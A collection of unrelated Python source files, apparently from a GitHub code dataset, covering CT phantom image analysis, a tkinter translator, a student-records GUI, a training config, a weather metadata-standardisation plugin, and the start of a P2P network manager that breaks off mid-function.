            diameter_in_cm = radius * self.PixSpace[0] * 2
            logging.debug(str(radius) + r"pix (radius), " + str(diameter_in_cm) +
                          r"cm(diameter)<==Calculated phantom diameter")
            # Standardize the radius to one of the two known phantom sizes.
            if diameter_in_cm < 250:
                radius = 233
                logging.debug(str(radius) + r"pix" + r", which is: " +
                              str(radius * self.PixSpace[0] * 2) + r"cm <==Radius Readjusted")
            else:
                radius = 220
                logging.debug(str(radius) + r"pix" + r", which is: " +
                              str(radius * self.PixSpace[0] * 2) + r"cm <==Radius Readjusted")
        else:
            logging.warning(r"Calculated center is abnormal, use 50 as radius!")
            radius = 50
            diameter_in_cm = radius * self.PixSpace[0]
        return (center_row, center_col), (radius, diameter_in_cm)

    def bresenham(self, radius):
        """
        Walk a circle of the given radius with the Bresenham midpoint scheme
        and accumulate the HU values of the visited pixels into
        self.Image_Integration_Result[radius].
        :param radius: radius (in pixels) of the sampled circle
        """
        x = 0
        y = radius
        d = 3 - 2 * radius
        while x < y:
            # Add all eight symmetric octant points for (x, y).
            self.Image_Integration_Result[radius] += self.ImageHU[self.Center[0] - y, self.Center[1] + x]
            self.Image_Integration_Result[radius] += self.ImageHU[self.Center[0] + y, self.Center[1] + x]
            self.Image_Integration_Result[radius] += self.ImageHU[self.Center[0] - y, self.Center[1] - x]
            self.Image_Integration_Result[radius] += self.ImageHU[self.Center[0] + y, self.Center[1] - x]
            self.Image_Integration_Result[radius] += self.ImageHU[self.Center[0] - x, self.Center[1] + y]
            self.Image_Integration_Result[radius] += self.ImageHU[self.Center[0] - x, self.Center[1] - y]
            self.Image_Integration_Result[radius] += self.ImageHU[self.Center[0] + x, self.Center[1] + y]
            self.Image_Integration_Result[radius] += self.ImageHU[self.Center[0] + x, self.Center[1] - y]
            if d < 0:
                d = d + 4 * x + 6
            else:
                d = d + 4 * (x - y) + 10
                y -= 1
            x += 1

    def integration(self):
        """Compute the mean HU per circle radius, then median-filter the curve."""
        # Circular integration for each radius, normalized by circumference.
        for index in range(1, len(self.Image_Integration_Result)):
            self.bresenham(index)
            self.Image_Integration_Result[index] /= (index * 2 * 3.14)
        # Sliding median filter of fixed width over the integration curve.
        _width = 8
        for index in range(len(self.Image_Integration_Result) - _width):
            self.Image_Median_Filter_Result[index] = np.median(
                self.Image_Integration_Result[index:index + _width])

    def save_image(self):
        """Save the rescaled image and the integration plot next to the input file."""
        if not self.isImageComplete:
            logging.warning(r"Image initialed incomplete. Procedure quited.")
            return
        # set up the output file names
        image__filename = ".jpeg"
        image__filename__fig = "_fig.jpeg"
        im = Image.fromarray(self.ImageRaw).convert("L")
        try:
            # NOTE(review): the data is written in PNG format although the
            # extension says .jpeg — confirm which is intended.
            im.save(self.FileName + "_" + self.ScanMode + image__filename, "png")
            # draw fig
            plt.plot(self.Image_Median_Filter_Result)
            plt.ylim((-5, 20))
            plt.xlim((0, 250))
            # draw fig image
            plt.savefig(self.FileName + "_" + self.ScanMode + image__filename__fig)
        except Exception as e:
            logging.error(str(e))
            return
        finally:
            plt.close()

    def show_image(self):
        """Return the rescaled image as a PIL grayscale image, or None if incomplete."""
        if not self.isImageComplete:
            logging.warning(r"Image initialed incomplete. Procedure quited.")
            return
        return Image.fromarray(self.ImageRaw).convert("L")

    def show_integration_result(self):
        """Return the median-filtered integration curve, or None if incomplete."""
        if not self.isImageComplete:
            logging.warning(r"Image initialed incomplete. Procedure quited.")
            return
        return self.Image_Median_Filter_Result
if __name__ == '__main__':
    # Manual debug entry point; the class is normally consumed via import.
    print("please do not use it individually unless of debugging.")
    logging.basicConfig(level=logging.DEBUG,
                        format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',
                        datefmt='%a, %d %b %Y %H:%M:%S')
    # Hard-coded local test file; window tuple is (width, center).
    img = ImageHandler('/Users/qianxin/Downloads/a')
    img.rescale_image((2, 100))
    img.save_image()
| snakeqx/ImagePosition | bat/ImageHandler.py | ImageHandler.py | py | 10,169 | python | en | code | 0 | github-code | 90 |
39099752237 | import tkinter as tk
import tkinter.ttk as tk1
import googletrans
import textblob
# Root window: fixed 900x400 layout for the translator UI.
window = tk.Tk()
window.geometry("900x400")
window.title("Translator by Mr. Ahmad")
#functions
def translate():
    """Translate the source text area into the language picked in the target combo."""
    try:
        # Find the language code (dict key) for the selected source language.
        for key, value in languages.items():
            if (value == ori_combo.get()):
                from_language_key = key
        # Find the language code for the selected target language.
        for key, value in languages.items():
            if(value == target_combo.get()):
                target_language_key = key
        # Wrap the source text area content in a TextBlob.
        words = textblob.TextBlob(ori_tA.get("1.0", "end-1c"))
        # Translate the blob between the two resolved language codes.
        words = words.translate(from_lang=from_language_key, to=target_language_key)
        # Show the translated text in the target text area.
        target_tA.insert(1.0, words)
    except Exception:
        # The old bare ``except:`` also swallowed KeyboardInterrupt/SystemExit;
        # Exception still covers the expected failures (no language selected
        # -> NameError, network/translation errors from textblob).
        print("Something is wrong")
def delete():
    """Clear both the source and the target text areas."""
    for text_area in (ori_tA, target_tA):
        text_area.delete("1.0", "end-1c")
#widgets
lb1 = tk.Label(window, text="My Translator", font=("Cooper",21),foreground="Salmon")
# Language mapping from googletrans: code -> display name; the combos show names.
languages = googletrans.LANGUAGES
language_list = list(languages.values())
ori_combo = tk1.Combobox(window, width=50, state="readonly", values=language_list)
ori_tA = tk.Text(window, height=10, width=40)
target_combo = tk1.Combobox(window, width=50, state="readonly",values=language_list)
target_tA = tk.Text(window, height=10, width=40)
translateBtn = tk.Button(window, text="Translate", font=("Britannic",17),background="DarkSlateBlue",foreground="White",command=translate)
deleteBtn = tk.Button(window, text="Delete", font=("Britannic",17), background="DarkRed",foreground="White",command=delete)
#placements
# Grid layout: source widgets in column 0, target widgets in column 2.
lb1.grid(row=0, column=1,pady=20)
ori_combo.grid(row=1, column=0, padx=27)
ori_tA.grid(row=2, column=0, pady=15)
translateBtn.grid(row=3, column=0, ipadx=104)
target_combo.grid(row=1,column=2)
target_tA.grid(row=2,column=2)
deleteBtn.grid(row=3,column=2,ipadx=120)
window.mainloop() | madyazdhil/Basic-Python | Term A+/SAT-13/lesson17/translator.py | translator.py | py | 1,995 | python | en | code | 0 | github-code | 90 |
41620478757 | import tkinter as tk
from tkinter import messagebox, simpledialog
from tkinter import ttk
import pickle
import os.path
class DisciplinaCursada:
    """One transcript entry: a course taken in a given year/semester with its
    final grade.

    Private attribute names are kept unchanged for pickle compatibility with
    previously saved student data.
    """

    def __init__(self, disciplina, ano, semestre, nota):
        self.__disciplina = disciplina
        self.__ano = ano
        self.__semestre = semestre
        self.__nota = nota

    def getDisciplina(self):
        """Course object for this entry."""
        return self.__disciplina

    def getAno(self):
        """Year in which the course was taken."""
        return self.__ano

    def getSemestre(self):
        """Semester in which the course was taken."""
        return self.__semestre

    def getNota(self):
        """Final grade obtained."""
        return self.__nota
class Historico:
    """A student's transcript: a collection of DisciplinaCursada entries."""

    def __init__(self):
        # Attribute name kept for pickle compatibility with saved data.
        self.__historico = []

    def addMateria(self, disciplina, ano, semestre, nota):
        """Record that ``disciplina`` was taken in ``ano``/``semestre`` with grade ``nota``."""
        entrada = DisciplinaCursada(disciplina, ano, semestre, nota)
        self.__historico.append(entrada)

    def getHistorico(self):
        """Return the transcript entries sorted by year (ascending)."""
        return sorted(self.__historico, key=lambda entrada: entrada.getAno())

    def getDisciplinas(self):
        """Return just the course objects, in insertion order."""
        return [entrada.getDisciplina() for entrada in self.__historico]
class Aluno:
    """A student: registration number, name, course and transcript."""

    def __init__(self, nroMatricula, nome, curso):
        self.__nome = nome
        self.__nroMatricula = nroMatricula
        self.__curso = curso
        self.__historico = Historico()

    def getNome(self):
        """Return the student's name."""
        return self.__nome

    def getNroMatricula(self):
        """Return the registration number."""
        return self.__nroMatricula

    def getCurso(self):
        """Return the course (Curso) the student is enrolled in."""
        return self.__curso

    def getHistorico(self):
        """Return the student's Historico (transcript)."""
        return self.__historico

    def addDisciplina(self, disciplina, ano=None, semestre=None, nota=None):
        """Record a course on the transcript.

        Fix: the original forwarded only ``disciplina`` to
        Historico.addMateria, which takes four arguments, so every call
        raised TypeError. The extra fields default to None so existing
        one-argument calls keep working.
        """
        self.__historico.addMateria(disciplina, ano, semestre, nota)

    def getCargaHoraria(self):
        """Return [mandatory, elective] course-hour totals over the transcript."""
        cargaHorariaObrigatoria = 0
        carregaHorariaEletiva = 0
        for disciplina in self.__historico.getDisciplinas():
            # The course decides whether each discipline is mandatory.
            if self.__curso.eObrigatoria(disciplina):
                cargaHorariaObrigatoria += int(disciplina.getCargaHoraria())
            else:
                carregaHorariaEletiva += int(disciplina.getCargaHoraria())
        return [cargaHorariaObrigatoria, carregaHorariaEletiva]
class LimiteInsereAluno(tk.Toplevel):
    """Top-level dialog for registering a new student.

    Collects registration number, name and course code, and forwards button
    events to the controller (criaAluno / clearHandlerIns).
    """
    def __init__(self, controle, listaCursosCod):
        """Build the dialog; ``listaCursosCod`` fills the course combobox."""
        tk.Toplevel.__init__(self)
        self.geometry('250x100')
        self.title("Estudante")
        self.controle = controle
        # One frame per form row, packed top to bottom.
        self.frameNro = tk.Frame(self)
        self.frameNome = tk.Frame(self)
        self.frameCurso = tk.Frame(self)
        self.frameButton = tk.Frame(self)
        self.frameNro.pack()
        self.frameNome.pack()
        self.frameCurso.pack()
        self.frameButton.pack()
        self.labelNro = tk.Label(self.frameNro,text="Nro Matrícula: ")
        self.labelNome = tk.Label(self.frameNome,text="Nome: ")
        self.labelNro.pack(side="left")
        self.labelNome.pack(side="left")
        # Entry fields read later by the controller via inputNro/inputNome.
        self.inputNro = tk.Entry(self.frameNro, width=20)
        self.inputNro.pack(side="left")
        self.inputNome = tk.Entry(self.frameNome, width=20)
        self.inputNome.pack(side="left")
        self.labelDiscip = tk.Label(self.frameCurso,text="Escolha o curso: ")
        self.labelDiscip.pack(side="left")
        # Selected course code is exposed through escolhaCombo.
        self.escolhaCombo = tk.StringVar()
        self.combobox = ttk.Combobox(self.frameCurso, width = 15 , textvariable = self.escolhaCombo)
        self.combobox.pack(side="left")
        self.combobox['values'] = listaCursosCod
        self.buttonSubmit = tk.Button(self.frameButton ,text="Criar")
        self.buttonSubmit.pack(side="left")
        self.buttonSubmit.bind("<Button>", controle.criaAluno)
        self.buttonClear = tk.Button(self.frameButton ,text="Clear")
        self.buttonClear.pack(side="left")
        self.buttonClear.bind("<Button>", controle.clearHandlerIns)
    def mostraJanela(self, titulo, msg):
        """Show an info popup with the given title and message."""
        messagebox.showinfo(titulo, msg)
class LimiteInsereAlunoDisciplina(tk.Toplevel):
    """Top-level dialog for adding a taken course to a student's transcript.

    Collects grade, year, semester and the course code, and forwards button
    events to the controller (insereDisciplinaHandler / clearHandlerInsDisc).
    """
    def __init__(self, controle, listaDiscCod):
        """Build the dialog; ``listaDiscCod`` fills the course combobox."""
        tk.Toplevel.__init__(self)
        self.geometry('250x250')
        self.title("Estudante")
        self.controle = controle
        # One frame per form row, packed top to bottom.
        self.frameNota = tk.Frame(self)
        self.frameNota.pack()
        self.frameAno = tk.Frame(self)
        self.frameAno.pack()
        self.frameSemestre = tk.Frame(self)
        self.frameSemestre.pack()
        self.frameDiscip = tk.Frame(self)
        self.frameDiscip.pack()
        self.frameButton = tk.Frame(self)
        self.frameButton.pack()
        self.labelNota= tk.Label(self.frameNota,text="Nota:")
        self.labelAno = tk.Label(self.frameAno,text="Ano")
        self.labelSemestre = tk.Label(self.frameSemestre,text="Semestre")
        self.labelAno.pack()
        self.labelNota.pack()
        self.labelSemestre.pack()
        # Entry fields read later by the controller.
        self.inputNota = tk.Entry(self.frameNota, width=20)
        self.inputNota.pack(side="left")
        self.inputAno = tk.Entry(self.frameAno, width=20)
        self.inputAno.pack(side="left")
        self.inputSemestre = tk.Entry(self.frameSemestre, width=20)
        self.inputSemestre.pack(side="left")
        self.labelDiscip = tk.Label(self.frameDiscip,text="Escolha o Disciplina: ")
        self.labelDiscip.pack()
        # Selected course code is exposed through escolhaCombo.
        self.escolhaCombo = tk.StringVar()
        self.combobox = ttk.Combobox(self.frameDiscip, width = 15 , textvariable = self.escolhaCombo)
        self.combobox.pack()
        self.combobox['values'] = listaDiscCod
        self.buttonSubmit = tk.Button(self.frameButton ,text="Enter")
        self.buttonSubmit.pack(side="left")
        self.buttonSubmit.bind("<Button>", controle.insereDisciplinaHandler)
        self.buttonClear = tk.Button(self.frameButton ,text="Clear")
        self.buttonClear.pack(side="left")
        self.buttonClear.bind("<Button>", controle.clearHandlerInsDisc)
    def mostraJanela(self, titulo, msg):
        """Show an info popup with the given title and message."""
        messagebox.showinfo(titulo, msg)
class LimiteMensagem():
    # NOTE(review): the parameter shadows the ``str`` builtin; renaming it
    # would change the keyword-call interface, so it is only flagged here.
    def __init__(self, str):
        """Show an info popup titled 'Aluno' with the given message."""
        messagebox.showinfo('Aluno', str)
class CtrlAluno():
    def __init__(self, controlePrincipal):
        """Load previously saved students from 'alunos.pickle' if present.

        NOTE(review): pickle.load executes arbitrary code from the file —
        acceptable only because the file is produced locally by salvaDados.
        """
        self.ctrlPrincipal = controlePrincipal
        if not os.path.isfile("alunos.pickle"):
            self.listaAlunos = []
        else:
            with open("alunos.pickle", "rb") as f:
                self.listaAlunos = pickle.load(f)
    def salvaDados(self):
        """Persist the student list to 'alunos.pickle'.

        NOTE(review): nothing is written when the list is empty, so deleting
        the last student would not persist — confirm intended.
        """
        if len(self.listaAlunos) != 0:
            with open("alunos.pickle","wb") as f:
                pickle.dump(self.listaAlunos, f)
    def insereAlunos(self):
        """Open the student-registration dialog with the available course codes."""
        self.listaAlunosTurma = []
        listaCursosCod = self.ctrlPrincipal.ctrlCurso.getListaCodCursos()
        self.limiteIns = LimiteInsereAluno(self, listaCursosCod)
    def criaAluno(self, event):
        """Create an Aluno from the dialog fields; all fields are required."""
        nroMatric = self.limiteIns.inputNro.get()
        nome = self.limiteIns.inputNome.get()
        cursoCod = self.limiteIns.escolhaCombo.get()
        if nroMatric == '' or nome == '' or cursoCod == '':
            self.limiteIns.mostraJanela('Erro', 'Preencha todos os campos')
        else:
            curso = self.ctrlPrincipal.ctrlCurso.getCurso(cursoCod)
            aluno = Aluno(nroMatric, nome, curso)
            self.listaAlunos.append(aluno)
            self.limiteIns.mostraJanela('Sucesso', 'Estudante cadastrado com sucesso')
            self.clearHandlerIns(event)
            self.limiteIns.destroy()
    def clearHandlerIns(self, event):
        """Clear all fields of the student-registration dialog."""
        self.limiteIns.inputNro.delete(0, tk.END)
        self.limiteIns.inputNome.delete(0, tk.END)
        self.limiteIns.escolhaCombo.set('')
    def clearHandlerInsDisc(self, event):
        """Clear all fields of the course-registration dialog."""
        self.limiteInsDisciplina.inputNota.delete(0, tk.END)
        self.limiteInsDisciplina.inputAno.delete(0, tk.END)
        self.limiteInsDisciplina.inputSemestre.delete(0, tk.END)
        self.limiteInsDisciplina.escolhaCombo.set('')
def cadastraDsciplinaCursada(self):
matricula = simpledialog.askstring('Aluno', 'Digite o código do aluno: ')
alunoSel = None
for aluno in self.listaAlunos:
if matricula == aluno.getNroMatricula():
alunoSel = aluno
if alunoSel is not None:
self.alunoSel = alunoSel
else:
self.ctrlPrincipal.limite.mostraJanela('Erro', 'Aluno não encontrado')
return
disciplinas = self.ctrlPrincipal.ctrlDisciplina.getDisciplinas()
disciplinasNCursadas= []
disciplinasCursadas = alunoSel.getHistorico().getDisciplinas()
for disciplina in disciplinas:
cursou = False
for disciplinaCursada in disciplinasCursadas:
if disciplina.getCodigo() == disciplinaCursada.getCodigo():
cursou = True
break
if not cursou:
disciplinasNCursadas.append(disciplina)
disciplinasCod = []
for disciplina in disciplinasNCursadas:
disciplinasCod.append(disciplina.getCodigo())
self.limiteInsDisciplina = LimiteInsereAlunoDisciplina(self, disciplinasCod)
def insereDisciplinaHandler(self, event):
disciplinaCod = self.limiteInsDisciplina.escolhaCombo.get()
disciplina = self.ctrlPrincipal.ctrlDisciplina.getDisciplina(disciplinaCod)
if disciplina is None:
self.ctrlPrincipal.limite.mostraJanela('Erro', 'Disciplina não encontrada')
return
ano = self.limiteInsDisciplina.inputAno.get()
semestre = self.limiteInsDisciplina.inputSemestre.get()
nota = self.limiteInsDisciplina.inputNota.get()
self.alunoSel.getHistorico().addMateria(disciplina, ano, semestre, nota)
self.limiteInsDisciplina.mostraJanela('Sucesso', 'Disciplina cadastrada com sucesso')
self.clearHandlerInsDisc(event)
self.limiteInsDisciplina.destroy()
def consultarAluno(self):
alunoCod = simpledialog.askstring('Aluno', 'Digite o código do aluno: ')
aluno = None
for el in self.listaAlunos:
if alunoCod == el.getNroMatricula():
aluno = el
if aluno is not None:
res = 'Nome: ' + aluno.getNome() + '\n'
res += 'Matrícula: ' + aluno.getNroMatricula() + '\n'
res += 'Curso: ' + aluno.getCurso().getNome() + '\n'
obrigatoria, pendente = aluno.getCargaHoraria()
res += 'Carga horária obrigatória: ' + str(obrigatoria) + '\n'
res += 'Carga horária pendente: ' + str(pendente) + '\n'
for disciplinaCursada in aluno.getHistorico().getHistorico():
disciplina = disciplinaCursada.getDisciplina()
situacao = "Aprovado"
if int(disciplinaCursada.getNota()) < 6:
situacao = "Reprovado"
res += '---------------------\n'
res += 'Disciplina: ' + disciplina.getNome() + '\n'
res += 'Código: ' + disciplina.getCodigo() + '\n'
res += 'Semestre: ' + str(disciplinaCursada.getSemestre()) + '\n'
res += 'Situação: ' + str(situacao) + '\n'
res += 'Ano: ' + str(disciplinaCursada.getAno()) + '\n'
res += '---------------------\n'
self.ctrlPrincipal.limite.mostraJanela('Aluno', res)
else:
self.ctrlPrincipal.limite.mostraJanela('Erro', 'Aluno não encontrado') | Luiss1569/Orietado-Objetos-I | Trabalhos/Trabalho 12/aluno.py | aluno.py | py | 11,632 | python | pt | code | 0 | github-code | 90 |
23089641573 | config = {
"exp_name": "uni_lstm",
"epochs": 20,
"encoder": "UniLSTM",
"batch_size": 128,
"hidden_dim": 2048,
"num_layers": 1,
"learning_rate": 1e-3,
"seed": 42,
"debug": False,
# "device": 'cpu',
"device": 'cuda',
"num_workers": 4,
"valid_freq": 1000,
"save_freq": 4000,
"test_checkpoint": 'best-model.pt'
} | AmanDaVinci/Universal-Sentence-Representations | configs/uni_lstm.py | uni_lstm.py | py | 368 | python | en | code | 0 | github-code | 90 |
30402659589 | from django.shortcuts import redirect,render
from django.contrib.auth import login,logout,authenticate
from shop.forms import *
from django.http import HttpResponse,HttpResponseRedirect
from shop.models.models import *
import os
# Create your views here.
fileDir = os.path.dirname(os.path.realpath(__file__))
# fileDir = os.path.dirname(fileDir)
split = fileDir.split('/')
media_dir = os.path.join(fileDir, 'images')
def home(request):
print(request.user.id)
products = Product.objects.all()
context = {
'products':products,
'request':request
}
print(request)
return render(request,'home.html',context)
def placeOrder(request,i):
customer= Customer.objects.get(id=i)
form=createorderform(instance=customer)
if(request.method=='POST'):
form=createorderform(request.POST,instance=customer)
if(form.is_valid()):
form.save()
return redirect('/')
context={'form':form}
return render(request,'placeOrder.html',context)
def addProduct(request):
form=createproductform()
if(request.method=='POST'):
form=createproductform(request.POST,request.FILES)
if(form.is_valid()):
form.save()
return HttpResponseRedirect('shop/home')
context={'form':form}
return render(request,'addProduct.html',context)
def registerPage(request):
if request.user.is_authenticated:
return redirect('home')
else:
form=createuserform()
customerform=createcustomerform()
if request.method=='POST':
form=createuserform(request.POST)
customerform=createcustomerform(request.POST)
if form.is_valid() and customerform.is_valid():
user=form.save()
customer=customerform.save(commit=False)
customer.user=user
customer.save()
return redirect('login')
context={
'form':form,
'customerform':customerform,
}
return render(request,'register.html',context)
def loginPage(request):
print('login')
if request.user.is_authenticated:
return HttpResponseRedirect('/shop/home')
else:
if request.method=="POST":
username=request.POST.get('username')
password=request.POST.get('password')
user=authenticate(request,username=username,password=password)
if user is not None:
login(request,user)
return HttpResponseRedirect('/shop/home')
context={}
return render(request,'login.html',context)
def logoutPage(request):
logout(request)
return HttpResponseRedirect('/shop/login')
def download_media(request, filename):
if request.method == 'GET':
print('dir_name',media_dir)
file_name_to_download = os.path.join(media_dir,filename)
print(file_name_to_download)
if os.path.exists(file_name_to_download):
with open(file_name_to_download, 'rb') as fh:
response = HttpResponse(fh.read(), content_type="image/jpg")
response['Content-Disposition'] = 'inline; filename=' + os.path.basename(file_name_to_download)
return response
else:
# log_obj.debug('download_media:file does not exists')
return HttpResponse("File does not exists", status=404)
def addToCart(request,pid,cid):
print(Customer.objects.all().values())
print(cid)
product = Product.objects.get(id=pid)
user = User.objects.get(id=cid)
form = quantityForm(request.POST)
if request.method=="POST":
if form.is_valid():
data=form.cleaned_data
quantity = data['quantity']
try:
print("create")
customer = Customer.objects.get(user=user)
Cart.objects.create(product=product, customer=customer, quantity=quantity)
return HttpResponse("Success")
except Costumer.DoesNotExist:
print("update")
customer = Customer.objects.create(name=user.username, user=user)
Cart.objects.create(product=product,customer=customer,quantity=quantity)
return HttpResponse("Success")
else:
print(form.errors)
return HttpResponse("failure")
else:
print("GET!!")
return HttpResponse("Failure")
def getCartItem(request,cid):
print(cid)
user = User.objects.get(id=cid)
costumer_id = Customer.objects.get(user=user)
cart_item = Cart.objects.filter(customer=costumer_id.id)
p_id=cart_item.values_list('product_id')
product=Product.objects.filter(id__in=p_id).values()
print(product)
return render(request,'Cart.html',{'cart_items':cart_item})
def checkout(request,cid):
user = User.objects.get(id=cid)
costumer_id = Customer.objects.get(user=user)
cart_item = Cart.objects.filter(customer=costumer_id.id)
print(cart_item)
ids=[]
for i in cart_item:
checkout = Checkout.objects.create(cart_item=i)
ids.append(checkout.id)
print(ids)
checkout = Checkout.objects.filter(id__in=ids)
return render(request,'checkout.html',{'checkout_items':checkout})
| Shashank-S-Rao/test | shop/views/views.py | views.py | py | 5,255 | python | en | code | 0 | github-code | 90 |
18579638839 | import sys
mina=10**10
def waru(a,b):
if a%b==0:
return a//b
else:
return (a//b)+1
N,H=map(int,input().split())
A=list()
B=list()
for i in range(N):
a,b=map(int,input().split())
A.append(a)
B.append(b)
ma=max(A)
ind=A.index(ma)
B=[i for i in B if i>ma]
B=sorted(B,reverse=True)
cou=1
s=0
for i in range(len(B)):
s+=B[i]
if H<=s:
print(i+1)
sys.exit()
H=H-s
print(len(B)+waru(H,ma)) | Aasthaengg/IBMdataset | Python_codes/p03472/s684454987.py | s684454987.py | py | 411 | python | en | code | 0 | github-code | 90 |
14064514191 | from typing import Any, Dict, List, Optional
import numpy as np
from iris.coords import CellMethod
from iris.cube import Cube, CubeList
from iris.exceptions import CoordinateNotFoundError
from numpy import dtype, ndarray
from improver import BasePlugin
from improver.metadata.amend import amend_attributes
from improver.metadata.check_datatypes import (
check_units,
get_required_dtype,
get_required_units,
)
from improver.metadata.constants.time_types import TIME_COORDS
from improver.utilities.round import round_close
class StandardiseMetadata(BasePlugin):
"""Plugin to standardise cube metadata"""
@staticmethod
def _rm_air_temperature_status_flag(cube: Cube) -> Cube:
"""
Remove air_temperature status_flag coord by applying as NaN to cube data.
See https://github.com/metoppv/improver/pull/1839 for further details.
"""
coord_name = "air_temperature status_flag"
try:
coord = cube.coord(coord_name)
except CoordinateNotFoundError:
coord = None
if coord:
if coord.attributes != {
"flag_meanings": "above_surface_pressure below_surface_pressure",
"flag_values": np.array([0, 1], dtype="int8"),
}:
raise ValueError(
f"'{coord_name}' coordinate is not of the expected form."
)
ncube = CubeList()
for cc in cube.slices_over("realization"):
coord = cc.coord(coord_name)
if np.ma.is_masked(coord.points):
raise ValueError(
f"'{coord_name}' coordinate has unexpected mask values."
)
mask = np.asarray(coord.points)
cc.data[mask.astype(bool)] = np.nan
cc.remove_coord(coord_name)
ncube.append(cc)
cube = ncube.merge_cube()
return cube
@staticmethod
def _collapse_scalar_dimensions(cube: Cube) -> Cube:
"""
Demote any scalar dimensions (excluding "realization") on the input
cube to auxiliary coordinates.
Args:
cube: The cube
Returns:
The collapsed cube
"""
coords_to_collapse = []
for coord in cube.coords(dim_coords=True):
if len(coord.points) == 1 and "realization" not in coord.name():
coords_to_collapse.append(coord)
for coord in coords_to_collapse:
cube = next(cube.slices_over(coord))
return cube
@staticmethod
def _remove_scalar_coords(cube: Cube, coords_to_remove: List[str]) -> None:
"""Removes named coordinates from the input cube."""
for coord in coords_to_remove:
try:
cube.remove_coord(coord)
except CoordinateNotFoundError:
continue
@staticmethod
def _standardise_dtypes_and_units(cube: Cube) -> None:
"""
Modify input cube in place to conform to mandatory dtype and unit
standards.
Args:
cube:
Cube to be updated in place
"""
def as_correct_dtype(obj: ndarray, required_dtype: dtype) -> ndarray:
"""
Returns an object updated if necessary to the required dtype
Args:
obj:
The object to be updated
required_dtype:
The dtype required
Returns:
The updated object
"""
if obj.dtype != required_dtype:
return obj.astype(required_dtype)
return obj
cube.data = as_correct_dtype(cube.data, get_required_dtype(cube))
for coord in cube.coords():
if coord.name() in TIME_COORDS and not check_units(coord):
coord.convert_units(get_required_units(coord))
req_dtype = get_required_dtype(coord)
# ensure points and bounds have the same dtype
if np.issubdtype(req_dtype, np.integer):
coord.points = round_close(coord.points)
coord.points = as_correct_dtype(coord.points, req_dtype)
if coord.has_bounds():
if np.issubdtype(req_dtype, np.integer):
coord.bounds = round_close(coord.bounds)
coord.bounds = as_correct_dtype(coord.bounds, req_dtype)
@staticmethod
def _discard_redundant_cell_methods(cube: Cube) -> None:
"""
Removes cell method "point": "time" from cube if present.
"""
if not cube.cell_methods:
return
removable_cms = [
CellMethod(method="point", coords="time"),
]
updated_cms = []
for cm in cube.cell_methods:
if cm in removable_cms:
continue
updated_cms.append(cm)
cube.cell_methods = updated_cms
def process(
self,
cube: Cube,
new_name: Optional[str] = None,
new_units: Optional[str] = None,
coords_to_remove: Optional[List[str]] = None,
attributes_dict: Optional[Dict[str, Any]] = None,
) -> Cube:
"""
Perform compulsory and user-configurable metadata adjustments. The
compulsory adjustments are:
- to collapse any scalar dimensions apart from realization (which is expected
always to be a dimension);
- to cast the cube data and coordinates into suitable datatypes;
- to convert time-related metadata into the required units
- to remove cell method ("point": "time").
Args:
cube:
Input cube to be standardised
new_name:
Optional rename for output cube
new_units:
Optional unit conversion for output cube
coords_to_remove:
Optional list of scalar coordinates to remove from output cube
attributes_dict:
Optional dictionary of required attribute updates. Keys are
attribute names, and values are the required value or "remove".
Returns:
The processed cube
"""
cube = self._rm_air_temperature_status_flag(cube)
cube = self._collapse_scalar_dimensions(cube)
if new_name:
cube.rename(new_name)
if new_units:
cube.convert_units(new_units)
if coords_to_remove:
self._remove_scalar_coords(cube, coords_to_remove)
if attributes_dict:
amend_attributes(cube, attributes_dict)
self._discard_redundant_cell_methods(cube)
# this must be done after unit conversion as if the input is an integer
# field, unit conversion outputs the new data as float64
self._standardise_dtypes_and_units(cube)
return cube
| metoppv/improver | improver/standardise.py | standardise.py | py | 6,926 | python | en | code | 95 | github-code | 90 |
28768621696 | import asyncio
import logging
import time
from secp256k1_zkp import PrivateKey, PublicKey
from .node import Node
from lnoise import Key
logger = logging.getLogger(__name__)
from .messages import message_id, inv_message_id
from uuid import uuid4
class NetworkManager:
def __init__(self, loop, syncer, config):
self.loop = loop
self.config = config
self.syncer = syncer
self.global_message_queue = syncer.queues['NetworkManager']
self.load_from_disc()
#for node in self.nodes.values():
# self.connect_to(node)
self.loop.call_soon(self.check_global_message_queue)
self.nodes={}
self.reconnect_list = {}
self.connecting = [] # nodes that are connecting, but not connected yet
self.server = asyncio.start_server(self.handle_connection, config['p2p']['host'], config['p2p']['port'], loop=loop)
self.tasks = []
self.up = True
asyncio.ensure_future(self.server, loop=loop)
asyncio.ensure_future(self.reconnect_loop(), loop=loop)
#set logging
default_log_level = logging.INFO;
if "logging" in config:#debug, info, warning, error, critical
loglevels = { "debug":logging.DEBUG, "info":logging.INFO, "warning":logging.WARNING, "error":logging.ERROR, "critical":logging.CRITICAL}
if "base" in config["logging"] and config["logging"]["base"] in loglevels:
logger.setLevel(loglevels[config["logging"]["base"]])
if "network" in config["logging"] and config["logging"]["network"] in loglevels:
#its ok to rewrite
logger.setLevel(loglevels[config["logging"]["network"]])
def load_from_disc(self):
lspriv=self.config['p2p']['lspriv']
s=Key(key=PrivateKey(lspriv.to_bytes(32,'big'), raw=True))
our_node_params = { 'network':
{
'host': self.config['p2p']['host'],
'port':self.config['p2p']['port'],
'advertised_host': self.config['p2p'].get('advertised_host', self.config['p2p']['host']),
'advertised_port': self.config['p2p'].get('advertised_port', self.config['p2p']['port']),
},
'static_full_key':s}
self.our_node = Node(None, our_node_params, self.loop, None)
logger.info("Our node public key %s"%s.pubkey())
self.nodes={}
def save_to_disc(self):
pass #TODO
async def connect_to(self, host_port_tuple, static_key=None):
if not host_port_tuple in self.nodes:
if not static_key:
raise Exception("Cannot connect to new node without static key")
host, port = host_port_tuple
new_node_params = { 'network': {'host':host, 'port':port}, 'static_key':static_key}
node = Node(self.our_node, new_node_params, self.loop, self.handle_message)
while host_port_tuple in self.connecting:
await asyncio.sleep(1)
if host_port_tuple in self.nodes:
return
self.connecting.append(host_port_tuple)
await node.connect()
self.connecting.remove(host_port_tuple)
async def handle_connection(self, reader, writer):
extra_info = writer.get_extra_info('peername')
host, port = extra_info[:2]
logger.info("New connection from %s %s"%(str(host), str(port)))
params = {'network':{'host':host, 'port':port}}
new_node = Node(self.our_node, params, self.loop, self.handle_message)
await new_node.accept_connection(reader, writer)
async def handle_message(self, node, _type, message):
if _type == "close": # TODO explanation that message can be thrown by Node-object itself in on_disconnect
if message[0] == 0:
if (node.host, node.port) in self.nodes:
self.nodes.pop((node.host, node.port))
#accidental disconnet, set to reconnect
node_params = (node.advertised_host, node.advertised_port)
if not node_params in self.reconnect_list:
if node.advertised_static_key: #we can't reconnect without static key
